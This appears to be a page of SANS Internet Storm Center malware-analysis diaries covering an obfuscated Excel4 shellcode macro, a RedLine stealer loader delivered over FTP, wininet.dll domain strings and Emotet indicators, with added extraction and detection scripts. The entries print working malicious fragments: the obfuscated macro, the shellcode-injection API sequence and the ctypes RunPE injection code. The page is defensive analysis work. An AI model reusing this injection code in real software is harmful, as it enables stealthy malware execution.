SANS Internet Storm Center - Cooperative Cyber Security Monitor
January 22, 2022

Mixed VBA & Excel4 Macro In a Targeted Excel Sheet, (Sat, Jan 22nd)

Yesterday, Nick, one of our readers, shared with us a very interesting Excel sheet and asked us to check if it was malicious. Guess what? Of course it was, and he agreed to be mentioned in a diary. Thanks to him! This time, we also have the context and how the file was used. It was delivered to the victim, who had been phoned beforehand to build trust in the file. A perfect example of a social engineering attack. The Excel sheet contains details of a real-estate project. It is called "Penthouse_8271.xls" and, once opened, you see this:

The real-estate agency mentioned in the sheet exists and is established in Austria. When I receive a suspicious file like this one, I always start with automated tools to speed up the analysis, but this time it did not work. To analyze VBA macros, one of my favorite tools is ViperMonkey, but it almost crashed my REMnux environment by using a lot of memory. Let's revert to manual analysis. Some quick findings: the macro is heavily obfuscated, and the code is padded with a lot of empty functions and comments. The macro does not have the classic AutoOpen() function that would execute it automatically. Instead, we have these functions:

Sub info()
    Tabelle1.Visible = True
    Tabelle1.Activate
    boop
End Sub

Sub beschreibung()
    Tabelle2.Visible = True
    Tabelle2.Activate
    boop
End Sub

Sub grundriss()
    Tabelle3.Visible = True
    Tabelle3.Activate
    boop
End Sub

Sub haftung()
    Tabelle5.Visible = True
    Tabelle5.Activate
    boop
End Sub

You see that the function names correspond to the buttons seen in the picture above. The malicious code is located in boop() and is only triggered when the user clicks one of those buttons. Let's click on "Penthouse Overview":

Note: this is a nice trick to defeat most sandboxes, because user interaction is required.

Legitimate information is displayed and the macro is executed. Let's have a look at the code:

Sub boop()
    SuperintendAuthors = Array()
    SuperintendAuthors = LongPleasures(SuperintendAuthors, ObtainedAncient("140000888e050094095b80e037e3000ac400f32308f044900eb00046500009e3f0bc0f40090e2b4290808e27008feea" & _
        "0b00040090e010009c2e58bc8213e910ac790c20051a819c21f150b01e465b126ec9b9e5ee08050ab40700bcc0c00803c118001d90fcf90ff8ff5bf" & _
        "ee11f51229d88f1e51fb121c8c926120c90e0c0a200fuopurr0wdbhjdb"))
    SuperintendAuthors = LongPleasures(SuperintendAuthors, ObtainedAncient("148e5e150510c90080d80f0f00ff8ff50200492e08059009a007ec9000ce94000204c0be90b1e8059e0c285e08353d260800914110" & _
        "ebbc91ec0c4108b1e3e0e85080090b00979040fea180fcaebcc0509c1d0109000ee900002a" & _
        "d6000835e30f747503217027b0a8014c11f126188044708fa174164103816408510964109f001" & _
        "lwppbij1cjpchuk"))
    SuperintendAuthors = LongPleasures(SuperintendAuthors, ObtainedAncient("14e010b96ca0090b0bffb5d03ea1f57f0e810a5690e5006ff3ccb77ffffc1fcc7e0c00619191001c6000009ec8530eb84000cc50071b" & _
        "080588bc470055ceb5598818829d181e20c8909ec8700898b0008c9028ebb872ee0f764" & _
        "b51e0829305ba3baee800b50f084103a0b00017c5010fec0d1ca31af1b8c04f0d0ebf3530b1c85tcquttu4jpgotwt"))

Pretty nice obfuscation! Multiple functions are called to decode all the strings, and finally the following one is called. It reveals the technique used:

Function SpecialLeaving(OverDesire As String)
    SpecialLeaving = ExecuteExcel4Macro(OverDesire)
End Function

ExecuteExcel4Macro() is a method of the Excel Application object that runs an Excel 4.0 (XLM) macro function passed as a string and returns its result[1]. Because the Excel4 macro is not stored in sheet cells but assembled at runtime from the decoded strings, the classic XLM deobfuscation tools won't work. To speed up the analysis, I added the following code to the macro so that every Excel4 string is logged before it is executed:

Sub DumpExcel4(buffer As String)
    Dim output As String
    output = "C:\temp\debug.txt"
    Open output For Append As #1
    Write #1, buffer    ' Write # quotes the string and doubles embedded quotes
    Close #1
End Sub

Function SpecialLeaving(OverDesire As String)
    DumpExcel4 OverDesire
    SpecialLeaving = ExecuteExcel4Macro(OverDesire)
End Function

This dumped all Excel4 function calls into a flat file. Once the macro had been executed in my lab, I got a nice debug.txt file (the doubled quotes come from Write #):

"CALL(""Kernel32"",""VirtualAlloc"",""JJJJJ"",4096,15992,12288,64)"
"CALL(""Kernel32"",""VirtualAlloc"",""JJJJJ"",8192,15992,12288,64)"
"CALL(""Kernel32"",""VirtualAlloc"",""JJJJJ"",12288,15992,12288,64)"
"CALL(""Kernel32"",""VirtualAlloc"",""JJJJJ"",16384,15992,12288,64)"
"CALL(""Kernel32"",""VirtualAlloc"",""JJJJJ"",20480,15992,12288,64)"
"CALL(""Kernel32"",""VirtualAlloc"",""JJJJJ"",24576,15992,12288,64)"
"CALL(""Kernel32"",""VirtualAlloc"",""JJJJJ"",28672,15992,12288,64)"
"CALL(""Kernel32"",""VirtualAlloc"",""JJJJJ"",32768,15992,12288,64)"
"CALL(""Kernel32"",""VirtualAlloc"",""JJJJJ"",36864,15992,12288,64)"
"CALL(""Kernel32"",""VirtualAlloc"",""JJJJJ"",40960,15992,12288,64)"
"CALL(""Kernel32"",""VirtualAlloc"",""JJJJJ"",45056,15992,12288,64)"
"CALL(""Kernel32"",""VirtualAlloc"",""JJJJJ"",49152,15992,12288,64)"
"CALL(""Kernel32"",""VirtualAlloc"",""JJJJJ"",53248,15992,12288,64)"
"CALL(""Kernel32"",""VirtualAlloc"",""JJJJJ"",57344,15992,12288,64)"
"CALL(""Kernel32"",""VirtualAlloc"",""JJJJJ"",61440,15992,12288,64)"
"CALL(""Kernel32"",""VirtualAlloc"",""JJJJJ"",65536,15992,12288,64)"
"CALL(""ntdll"",""memset"",""JJJJ"",65536,232, 1)"
"CALL(""ntdll"",""memset"",""JJJJ"",65537,0, 1)"
"CALL(""ntdll"",""memset"",""JJJJ"",65538,0, 1)"
"CALL(""ntdll"",""memset"",""JJJJ"",65539,0, 1)"
"CALL(""ntdll"",""memset"",""JJJJ"",65540,0, 1)"
"CALL(""ntdll"",""memset"",""JJJJ"",65541,89, 1)"
"CALL(""ntdll"",""memset"",""JJJJ"",65542,72, 1)"
"CALL(""ntdll"",""memset"",""JJJJ"",65543,131, 1)"
"CALL(""ntdll"",""memset"",""JJJJ"",65544,233, 1)"

We see that memory is allocated in 4 KB steps (the first VirtualAlloc() parameter is the requested base address; the third, 12288 or 0x3000, is MEM_COMMIT | MEM_RESERVE). The last parameter is 64 (0x40), i.e. PAGE_EXECUTE_READWRITE: the memory is meant to hold executable code. Then the payload is written into memory byte by byte with a very long series of memset() calls. Finally, the payload is executed on the last line, with CreateThread() pointing at the first byte written (65536):

"CALL(""Kernel32"",""CreateThread"",""JJJJJJB"",0,0,65536,0,0,0)"

The macro dumped 16009 lines into the file! Now we can extract the payload (the byte value is the fifth comma-separated field of each memset() line; sets.py is Didier Stevens' tool):

remnux@remnux:/MalwareZoo/20220121$ grep memset debug.txt | awk -F ',' '{print $5}'|sets.py join ","

The result is a series of decimal byte values:

232,0,0,0,0,89,72,131,233,5,186,120,62,0,0,51,192,64,144,15,132,79,36,0,0,233,107,5,0,0,252,233,63,...

The fastest way to decode this is CyberChef with a simple "From Decimal" recipe. The first bytes, E8 00 00 00 00 59 48 83 E9 05 (call $+5; pop rcx; sub rcx, 5), are the classic get-PC prologue of 64-bit position-independent shellcode. I did a quick analysis of the shellcode: it connects to acrobatrelay[.]com, but I don't have all the details at this time; still under investigation...
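As an added example (not the author's tooling), here is a small Python script that does the same extraction as the grep/awk pipeline above and additionally flags the allocate-RWX / write / start-thread pattern. It parses the CALL() lines exactly as Write # dumped them (quotes doubled), keys the memset() writes by address so that gaps and out-of-order lines are handled, and rebuilds the buffer. The embedded dump is a constructed excerpt in the same shape as the one above; pass the path of the real debug.txt as first argument to get a shellcode.bin file.

```python
import re
import sys

# Constructed sample in the shape of the debug.txt dump above (VBA's Write # wraps each
# line in quotes and doubles the quotes inside). Real use: pass the dump's path as argv[1].
SAMPLE_DUMP = '''\
"CALL(""Kernel32"",""VirtualAlloc"",""JJJJJ"",4096,15992,12288,64)"
"CALL(""Kernel32"",""VirtualAlloc"",""JJJJJ"",65536,15992,12288,64)"
"CALL(""ntdll"",""memset"",""JJJJ"",65536,232, 1)"
"CALL(""ntdll"",""memset"",""JJJJ"",65537,0, 1)"
"CALL(""ntdll"",""memset"",""JJJJ"",65538,0, 1)"
"CALL(""ntdll"",""memset"",""JJJJ"",65539,0, 1)"
"CALL(""ntdll"",""memset"",""JJJJ"",65540,0, 1)"
"CALL(""ntdll"",""memset"",""JJJJ"",65541,89, 1)"
"CALL(""ntdll"",""memset"",""JJJJ"",65542,72, 1)"
"CALL(""ntdll"",""memset"",""JJJJ"",65543,131, 1)"
"CALL(""ntdll"",""memset"",""JJJJ"",65544,233, 1)"
"CALL(""Kernel32"",""CreateThread"",""JJJJJJB"",0,0,65536,0,0,0)"
'''

CALL_RE = re.compile(
    r'CALL\(""(?P<dll>[^"]+)"",""(?P<func>[^"]+)"",""(?P<sig>[^"]+)""'
    r'(?P<args>(?:,[^,)]+)*)\)')

PAGE_EXECUTE_READWRITE = 0x40
MEM_COMMIT_RESERVE = 0x3000


def parse_calls(dump):
    """Yield (dll, function, [integer args]) for every CALL() line in the dump."""
    for line in dump.splitlines():
        m = CALL_RE.search(line)
        if not m:
            continue
        args = [int(a) for a in m.group('args').split(',') if a.strip()]
        yield m.group('dll'), m.group('func'), args


def rebuild_shellcode(dump):
    """Reassemble the byte-by-byte memset() writes into one buffer.

    Writes are keyed by address, so lines may be out of order; unwritten
    addresses inside the range stay 0x00. Returns (base_address, bytes).
    """
    writes = {}
    for _dll, func, args in parse_calls(dump):
        if func.lower() == 'memset' and len(args) == 3 and args[2] == 1:
            writes[args[0]] = args[1] & 0xff
    if not writes:
        return None, b''
    base = min(writes)
    buf = bytearray(max(writes) - base + 1)
    for addr, value in writes.items():
        buf[addr - base] = value
    return base, bytes(buf)


def suspicious_calls(dump):
    """Flag the allocate-RWX / write / start-thread pattern seen in the dump."""
    findings = []
    for _dll, func, args in parse_calls(dump):
        if func == 'VirtualAlloc' and len(args) == 4:
            if args[2] & MEM_COMMIT_RESERVE and args[3] == PAGE_EXECUTE_READWRITE:
                findings.append(f'VirtualAlloc RWX at 0x{args[0]:x}, {args[1]} bytes')
        elif func == 'CreateThread' and len(args) >= 3:
            findings.append(f'CreateThread start address 0x{args[2]:x}')
    return findings


if __name__ == '__main__':
    dump = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_DUMP
    base, sc = rebuild_shellcode(dump)
    print('\n'.join(suspicious_calls(dump)))
    print(f'{len(sc)} bytes written from 0x{base:x}; first bytes: {sc[:8].hex()}')
    with open('shellcode.bin', 'wb') as f:
        f.write(sc)
```

Before feeding shellcode.bin to a disassembler, check that its first bytes are E8 00 00 00 00 59, which is what the decimal list above starts with; if they are not, the dump was probably not complete when the macro was stopped.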

[1] https://docs.microsoft.com/en-us/office/vba/api/excel.application.executeexcel4macro

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
January 21, 2022

Obscure Wininet.dll Feature? , (Fri, Jan 21st)

The Internet Storm Center relies on a group of Handlers[1], volunteers who give some of their free time to the community besides their daily jobs. Sometimes we share information about an incident or a problem we are facing and ask for help. Indeed, why not ask fellow Handlers with broad experience? Yesterday, Bojan was involved in an incident with a customer and came back to us with this question:

"Did you already see this long list of domain names listed in C:\Windows\SysWOW64\wininet.dll on Windows 10?"

$ strings -e l wininet.dll | egrep 'hr\.'
hr.com.eujuicers
hr.global
hr.prvikvadrat
hr.ak-varazdin
hr.stin
hr.pizzeriaamadeus
hr.silvergoldbull
hr.maskice
hr.perzeidi
hr.udruga-point
hr.tokic
hr.advance
hr.com.airbnb
hr.svijet-medija
hr.autoskole
hr.kub
hr.slink
hr.com.cevo
hr.mall
hr.autoskola
hr.blablacar
hr.abpis
hr.audion
hr.from.brunohenc
hr.orkestar-krizevci
...

Immediately, other handlers checked in their own labs and reported the same finding. Bojan, based in Croatia, had searched for the ".hr" TLD (note that the strings are stored with the labels reversed: hr.com.airbnb is airbnb.com.hr). I searched for ".be":

$ strings -e l wininet.dll | grep "be\."
be.slimmerbouwen
be.fanjoe
be.buderus-family
be.loanstreet
be.de-spil
be.maximdeboiserie
be.intux
be.lafosseobservatoire
be.rubendv
be.rigartmichael
be.eliott
be.pgtb
be.kgm-irm
be.psncardplus
be.carroarmato0
be.poollicht
be.mths
be.nord-sud
be.centralpoint
...

Guy ran the same test and reported that his copy of the DLL contains 47881 Unicode strings! We tested several Windows 10 systems and all of them had the same kind of strings in wininet.dll, so Bojan's copy was not compromised.

What is this DLL? wininet, or "Win32 Internet Extensions"[2], is the library that lets programs interact with the Internet over HTTP and FTP. It provides well-known API calls like:

InternetOpenUrl
InternetReadFile
HttpOpenRequest

You can imagine that it is used by a lot of processes and applications. Note that you can list which processes have loaded a specific DLL with the following command:

C:\Users\REM>t​asklist /m wininet.dll

Image Name                     PID Modules
========================= ======== ============================================
taskhostw.exe                 4576 wininet.dll
explorer.exe                  4964 WININET.dll
ShellExperienceHost.exe       4004 WININET.dll
SearchUI.exe                  4368 WININET.dll
RuntimeBroker.exe             5192 WININET.dll
Fiddler.exe                   7048 WININET.dll
WinStore.App.exe              2036 WININET.dll
RuntimeBroker.exe               64 WININET.dll

Let's come back to the list of suspicious domains. What did we find? There are domains under many different TLDs. Some belong to small companies, others to big players in various sectors, with no obvious relation between them. What we found is that many of them appear on the HSTS preload list: Chrome ships a hardcoded list of sites that must only be reached over HTTPS[3]. Does Microsoft implement the same within wininet.dll?

Our next step was to start debugging the DLL to learn more about these domains. They are passed to a function called IsHostInBlocklist(), which is in turn called from two separate locations CServerInfo::DetermineStrongCryptoState(), and CServerInfo::DetermineFalseStartState().

This function, IsHostInBlockList(), is reached from interesting API calls, but only through a deep chain of intermediate functions.

At this time, we are still investigating and trying to understand the purpose of those hardcoded domains and functions. They are listed in the DLL symbols[4] but no documentation was found. If you have more information, or if you are working for Microsoft, please share your findings with us!
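As an added example (not the handlers' own commands), the following Python replicates `strings -e l` and turns the reversed-label strings into ordinary domain names grouped by TLD, which makes comparing the list against the HSTS preload list straightforward. That the labels are stored reversed (hr.com.airbnb being airbnb.com.hr) is my reading of the dumps above, not something the DLL's symbols state. The embedded byte blob is constructed so the script runs without the DLL; pass the path to wininet.dll as first argument to run it against the real file.

```python
import re
import sys
from collections import defaultdict

# Constructed stand-in for the DLL: a few UTF-16LE strings in the reversed-label form
# seen above, separated by junk bytes. Real use: pass the DLL path as argv[1].
SAMPLE_BLOB = (
    b'\x00\x11\x22'
    + 'hr.com.airbnb'.encode('utf-16-le') + b'\x00\x00'
    + b'\x90\x90'
    + 'be.centralpoint'.encode('utf-16-le') + b'\x00\x00'
    + 'hr.tokic'.encode('utf-16-le') + b'\x00\x00'
    + b'\xff\xfe'
    + 'ab'.encode('utf-16-le') + b'\x00\x00'              # shorter than min_len, ignored
    + 'not a domain string'.encode('utf-16-le') + b'\x00\x00'
)

LABELS_RE = re.compile(r'^[a-z0-9-]+(?:\.[a-z0-9-]+)+$')


def utf16le_strings(blob, min_len=4):
    """Equivalent of `strings -e l`: runs of printable ASCII stored as UTF-16LE."""
    pat = re.compile(rb'(?:[\x20-\x7e]\x00){%d,}' % min_len)
    return [m.group().decode('utf-16-le') for m in pat.finditer(blob)]


def reversed_to_domain(s):
    """'hr.com.airbnb' -> 'airbnb.com.hr'; None if the string is not dotted labels."""
    if not LABELS_RE.match(s):
        return None
    return '.'.join(reversed(s.split('.')))


def domains_by_tld(blob):
    """Map TLD -> list of domains, from the reversed-label strings in the blob."""
    out = defaultdict(list)
    for s in utf16le_strings(blob):
        domain = reversed_to_domain(s)
        if domain:
            out[domain.rsplit('.', 1)[1]].append(domain)
    return dict(out)


if __name__ == '__main__':
    blob = open(sys.argv[1], 'rb').read() if len(sys.argv) > 1 else SAMPLE_BLOB
    for tld, domains in sorted(domains_by_tld(blob).items()):
        print(f'{tld}: {len(domains)} domains, e.g. {domains[:3]}')
```

On the real DLL the label filter will also drop legitimate strings that contain spaces or uppercase characters, which is intended: the point is to isolate the domain table from the 47881 other strings.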

[1] https://isc.sans.edu/handler_list.html
[2] https://docs.microsoft.com/en-us/cpp/mfc/win32-internet-extensions-wininet?view=msvc-170
[3] https://hstspreload.org/
[4] https://lise.pnfsoftware.com/winpdb/8B274E3115F9D58AB6E0DCF4CA336C86E4E1866AE7E801860B5F2876FAE48E24-wininet.html

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

January 21, 2022

ISC Stormcast For Friday, January 21st, 2022 https://isc.sans.edu/podcastdetail.html?id=7846, (Fri, Jan 21st)

January 20, 2022

RedLine Stealer Delivered Through FTP, (Thu, Jan 20th)

Here is a piece of malicious Python script that injects a RedLine[1] stealer into its own process. Process injection has been a common attacker technique for a long time. The difference in this case is that the payload is delivered through FTP! That's pretty unusual, because FTP is used less and less, for multiple reasons (no encryption by default, complex to filter because of the passive/active modes). Support for FTP has even been removed from Chrome starting with version 95! But FTP remains a common protocol in the IoT/Linux landscape, with malware families like Mirai: my honeypots still collect a lot of Mirai samples from FTP servers. I don't understand why the attacker chose this protocol because, in most corporate environments, outbound FTP is not allowed by default (and should definitely not be!).

The Python script contains the credentials and the FTP server IP address. When you connect manually, you can list a bunch of different payloads, but the one used in this case is 001.ENC.

remnux@remnux:/MalwareZoo/20220119$ ftp x.x.x.x
Connected to x.x.x.x.
220-FileZilla Server 0.9.60 beta
220-written by Tim Kosse (tim.kosse@filezilla-project.org)
220 Please visit https://filezilla-project.org/
Name (62.109.1.213:root): launcher
331 Password required for launcher
Password:
230 Logged on
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||58066|)
150 Opening data channel for directory listing of "/"
-r--r--r-- 1 ftp ftp 228352 Jan 17 21:25 001.ENC
-r--r--r-- 1 ftp ftp 228352 Jan 17 21:25 002.ENC
-r--r--r-- 1 ftp ftp 879104 Jan 17 09:26 11.ENC
-r--r--r-- 1 ftp ftp 675840 Aug 14  2021 1650.ENC
-r--r--r-- 1 ftp ftp 675328 Dec 11  2021 167.ENC
-r--r--r-- 1 ftp ftp 675328 Jan 02 13:01 1680.ENC
226 Successfully transferred "/"
ftp>

The payload is encrypted, and the following function does the job of decrypting the PE file. It is a textbook RC4 implementation (key scheduling followed by the keystream generator) with the hardcoded key "JHGIEKC6U"; despite its name, encode_data() decrypts as well as it encrypts, because RC4 is symmetric:

def encode_data(data):
    key = b"JHGIEKC6U"
    # RC4 key-scheduling algorithm (KSA)
    S = bytearray(range(256))
    j = 0
    out = bytearray()
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]
    # RC4 pseudo-random generation algorithm (PRGA), XORed with the input
    i = j = 0
    for char in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(char ^ S[(S[i] + S[j]) % 256])
    return bytes(out)

As I tell my students when I'm teaching FOR610: when you are investigating an incident, the way the payload was encrypted or encoded is less relevant than the payload itself. To extract the PE file, I just wrote a quick Python script that replicates this function and dumps the payload into a file.

The decrypted payload SHA256 is 0eeb332efa3c20c2f3d85d07d844ba6150bdee3c1eade52f0f2449c3d2727334 and is unknown on VT at this time.
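As an added example (my code, not the author's script), here is a stand-alone decryptor that replicates the RC4 routine above under a clearer name and checks the result for a valid PE header before writing it out, which catches a wrong key or a truncated download early. The encrypted sample it ships with is constructed: a minimal fake PE header encrypted with the sample's key, so the script runs offline. Pass the path of the real 001.ENC as first argument to decrypt it.

```python
import hashlib
import struct
import sys

KEY = b"JHGIEKC6U"   # key hard-coded in the sample's encode_data()


def rc4(key, data):
    """Plain RC4 (KSA + PRGA), the same algorithm as the sample's encode_data()."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xff
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for c in data:
        i = (i + 1) & 0xff
        j = (j + S[i]) & 0xff
        S[i], S[j] = S[j], S[i]
        out.append(c ^ S[(S[i] + S[j]) & 0xff])
    return bytes(out)


def looks_like_pe(blob):
    """Cheap sanity check: 'MZ' at offset 0, e_lfanew at 0x3c pointing at 'PE\\0\\0'."""
    if len(blob) < 0x40 or blob[:2] != b'MZ':
        return False
    e_lfanew = struct.unpack_from('<I', blob, 0x3c)[0]
    return blob[e_lfanew:e_lfanew + 4] == b'PE\x00\x00'


def decrypt_payload(enc, key=KEY):
    """Decrypt and refuse to return anything that is not a PE image."""
    dec = rc4(key, enc)
    if not looks_like_pe(dec):
        raise ValueError('decrypted data is not a PE file: wrong key or damaged download?')
    return dec


def fake_pe():
    """Constructed stand-in for a real PE: DOS header + 'PE\\0\\0' signature only."""
    hdr = bytearray(0x40)
    hdr[:2] = b'MZ'
    struct.pack_into('<I', hdr, 0x3c, 0x40)    # e_lfanew: right after the DOS header
    return bytes(hdr) + b'PE\x00\x00' + b'\x00' * 20


# Constructed 001.ENC substitute: the fake PE encrypted with the sample's key.
SAMPLE_ENC = rc4(KEY, fake_pe())


if __name__ == '__main__':
    if len(sys.argv) > 1:
        enc, out = open(sys.argv[1], 'rb').read(), sys.argv[1] + '.bin'
    else:
        enc, out = SAMPLE_ENC, 'payload.bin'
    pe = decrypt_payload(enc)
    with open(out, 'wb') as f:
        f.write(pe)
    print(f'wrote {len(pe)} bytes to {out}, sha256 {hashlib.sha256(pe).hexdigest()}')
```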

The script also contains hex-encoded shellcode. Why do we have shellcode and another payload? Here is the function used to inject the code:

def runpe(peimage):
    # sc is the hex-decoded shellcode, defined elsewhere in the script
    filepathenv = "%ProgramFiles%\\Internet Explorer\\iexplore.exe"
    filepath = os.path.expandvars(filepathenv)
    ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_void_p
    # 0x3000 = MEM_COMMIT | MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE
    p = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(sc)),
                                            ctypes.c_int(0x3000), ctypes.c_int(0x40))
    ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(p), sc, ctypes.c_int(len(sc)))
    q = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(peimage)),
                                            ctypes.c_int(0x3000), ctypes.c_int(0x40))
    ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(q), peimage, ctypes.c_int(len(peimage)))
    # Treat the shellcode buffer as a function taking (target path, PE image)
    run = ctypes.cast(p, ctypes.WINFUNCTYPE(ctypes.c_void_p, ctypes.c_void_p, ctypes.c_void_p))
    run(filepath.encode('utf8') + b'\x00', q)

You see that two calls to VirtualAlloc() are performed (0x3000 is MEM_COMMIT | MEM_RESERVE, 0x40 is PAGE_EXECUTE_READWRITE). The first one is used to load the shellcode into memory and the second to load the payload (RedLine itself). The most interesting line is the one with ctypes.cast(): it turns the address of the shellcode into a function pointer with two pointer arguments. Once that is done, the shellcode can be called like any standard Python function:

run(filepath.encode('utf8')+b'\x00', q)

Through the shellcode, Python then executes the RedLine PE image that was copied into memory; the function name (runpe) and the iexplore.exe path passed as first argument point to a classic RunPE loader targeting a new Internet Explorer process. My sample tried to connect to the following C2, but it was offline: 78[.]24[.]222[.]162:37819.

The initial Python script (SHA256:e6d6451b82a03a3199770c490907ef01c401cc44826162a97d0f22aa9c122619) has a VT score of 14/58[2].

[1] https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
[2] https://www.virustotal.com/gui/file/e6d6451b82a03a3199770c490907ef01c401cc44826162a97d0f22aa9c122619

Xavier Mertens (@xme)
Xameco
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key

January 20, 2022

ISC Stormcast For Thursday, January 20th, 2022 https://isc.sans.edu/podcastdetail.html?id=7844, (Thu, Jan 20th)

January 19, 2022

0.0.0.0 in Emotet Spambot Traffic, (Wed, Jan 19th)

Introduction

Emotet often uses information from emails and address books stolen from infected Windows hosts.  Malicious spam (malspam) from Emotet spoofs legitimate senders to trick potential victims into running malicious files.

Additionally, Emotet uses IP address 0.0.0.0 in spambot traffic, possibly attempting to hide the actual IP address of an Emotet-infected host.

This ISC diary reviews the spoofed 0.0.0.0 address used in a recent Emotet infection from Tuesday 2022-01-18.


Shown above:  0.0.0.0 in DNS queries from an Emotet-infected host.

Scenes from an infection

Both Emotet botnets (dubbed by researchers as "epoch 4" and "epoch 5") resumed activity after the recent holiday season, and malicious spam started approximately one week ago on Tuesday 2022-01-11.

Most Windows hosts I've infected with Emotet in my lab will start spamming within an hour or less after the initial infection.  Refer to the images below for activity from a recent Emotet infection on 2022-01-18.


Shown above:  Screenshot from malspam pushing Emotet on Tuesday 2022-01-18.


Shown above:  Web page from link in the malspam.


Shown above:  Example of downloaded Excel spreadsheet for Emotet.

Enable macros in a downloaded spreadsheet, and they will infect a vulnerable Windows host.  This is standard operating procedure for Emotet.


Shown above:  Traffic from an infection filtered in Wireshark.


Shown above:  Spambot activity started approximately 27 minutes after the initial infection.

Emotet spambot traffic using 0.0.0.0

Right as the spambot activity starts, the following DNS queries are made to domains used for spam filtering (DNS-based blocklists):

  • 0.0.0.0.spam.abuse.ch
  • 0.0.0.0.b.barracudacentral.org
  • 0.0.0.0.bl.mailspike.net
  • 0.0.0.0.spam.dnsbl.sorbs.net
  • 0.0.0.0.zen.spamhaus.org

Similar DNS queries, but without the 0.0.0.0, are generated during Trickbot infections. However, Trickbot uses the infected host's public IP address in the DNS query. Here is an example from the analysis of a Trickbot sample (scroll down to the "Domains" list).


Shown above:  0.0.0.0-related DNS queries from an Emotet-infected host.

In addition to DNS queries, Emotet uses 0.0.0.0 during SMTP communications.  This happens whenever an Emotet-infected host tries sending malspam to a targeted mailserver.  The SMTP command is EHLO [0.0.0.0].


Shown above:  SMTP traffic using EHLO [0.0.0.0].

This attempt does not hide the actual IP address of an Emotet-infected host, because it still appears elsewhere in the SMTP traffic (blurred in the above image, for example).  But 0.0.0.0 can be an indicator of emails pushing Emotet or other malware.
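As an added example (not from the diary's pcap or Brad's tooling), here is Python that picks these two indicators out of log lines: DNSBL self-checks with 0.0.0.0 versus lookups of a real address (a DNSBL query carries the address with its octets reversed, which is the standard lookup form and the assumption behind the constructed "Trickbot-style" line), and SMTP greetings of EHLO [0.0.0.0]. The log lines are constructed in a generic resolver-log and SMTP-log shape; adjust the regexes to your own log format.

```python
import re

# DNS-based blocklist zones queried by the Emotet spambot, from the list above.
DNSBL_ZONES = ('spam.abuse.ch', 'b.barracudacentral.org', 'bl.mailspike.net',
               'spam.dnsbl.sorbs.net', 'zen.spamhaus.org')

# Constructed log lines (not real captures): "<time> <client> query A <name>" and SMTP greetings.
SAMPLE_DNS = [
    '2022-01-18 14:02:11 10.1.1.50 query A 0.0.0.0.zen.spamhaus.org',
    '2022-01-18 14:02:11 10.1.1.50 query A 0.0.0.0.b.barracudacentral.org',
    '2022-01-18 14:02:12 10.1.1.50 query A mail.example.net',
    '2022-01-18 14:05:40 10.1.1.77 query A 5.4.3.198.zen.spamhaus.org',   # asks about 198.3.4.5
]
SAMPLE_SMTP = [
    '10.1.1.50 -> 203.0.113.25:25 EHLO [0.0.0.0]',
    '10.1.1.60 -> 203.0.113.25:25 EHLO mail.corp.example',
    '10.1.1.70 -> 203.0.113.25:25 HELO [0.0.0.0]',
]

DNSBL_RE = re.compile(
    r'(?<![\w.])(\d{1,3}(?:\.\d{1,3}){3})\.('
    + '|'.join(re.escape(z) for z in DNSBL_ZONES) + r')(?![\w.-])')
EHLO_ZERO_RE = re.compile(r'\b(?:EHLO|HELO)\s+\[0\.0\.0\.0\]', re.IGNORECASE)


def dnsbl_lookups(lines):
    """Return (line, ip_asked_about, zone) for every DNSBL query in the lines.

    A DNSBL query carries the IP with its octets reversed, so
    5.4.3.198.zen.spamhaus.org asks about 198.3.4.5; 0.0.0.0 reverses to itself.
    """
    hits = []
    for line in lines:
        m = DNSBL_RE.search(line)
        if m:
            ip = '.'.join(reversed(m.group(1).split('.')))
            hits.append((line, ip, m.group(2)))
    return hits


def classify_dns(lines):
    """Split DNSBL self-checks into Emotet-style (0.0.0.0) and real-address lookups."""
    emotet, other = [], []
    for _line, ip, zone in dnsbl_lookups(lines):
        (emotet if ip == '0.0.0.0' else other).append((ip, zone))
    return emotet, other


def ehlo_zero(lines):
    """SMTP greetings claiming [0.0.0.0] as the client's own address."""
    return [line for line in lines if EHLO_ZERO_RE.search(line)]
```

Workstations have no business querying DNSBL zones at all, so the "other" bucket is worth an alert too, not only the 0.0.0.0 one.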


Shown above:  Example of Emotet malspam with 0.0.0.0 in the email headers.

Final words

While 0.0.0.0 is an indicator for Emotet or other malware, you can find up-to-date indicators for Emotet malware samples, URLs, and C2 IP addresses at:

---

Brad Duncan
brad [at] malware-traffic-analysis.net

January 19, 2022

ISC Stormcast For Wednesday, January 19th, 2022 https://isc.sans.edu/podcastdetail.html?id=7842, (Wed, Jan 19th)

January 18, 2022

Phishing e-mail with...an advertisement?, (Tue, Jan 18th)

Authors of phishing and malspam messages like to use various techniques to make their creations appear as legitimate as possible in the eyes of the recipients. To this end, they often try to make their messages look like reports generated by security tools[1], responses to previous communication initiated by the recipient[2], or instructions from someone at the recipient's organization[3], just to name a few. Most such techniques have been with us for a long time; however, last week I came across one that I don't believe I've ever seen before: the inclusion of what may be thought of as an advertisement in the body of the message.

Although it may sound strange, the inclusion did make at least some sort of sense. The message was supposed to look like a notification about a new "fax" sent by a Xerox scanner, and its footer, slightly reminiscent of the ads displayed by Google in search results, included links and text related to Xerox solutions.

One can only guess at whether this addition makes the message more or less believable to a regular user, but it is certainly unusual… However, it wasn’t the only slightly atypical thing about the e-mail.

As you may see in the image above, the message carried an HTM attachment. This contained an entire fake login page for Office 365 (it only loaded the O365 logo from an external site).

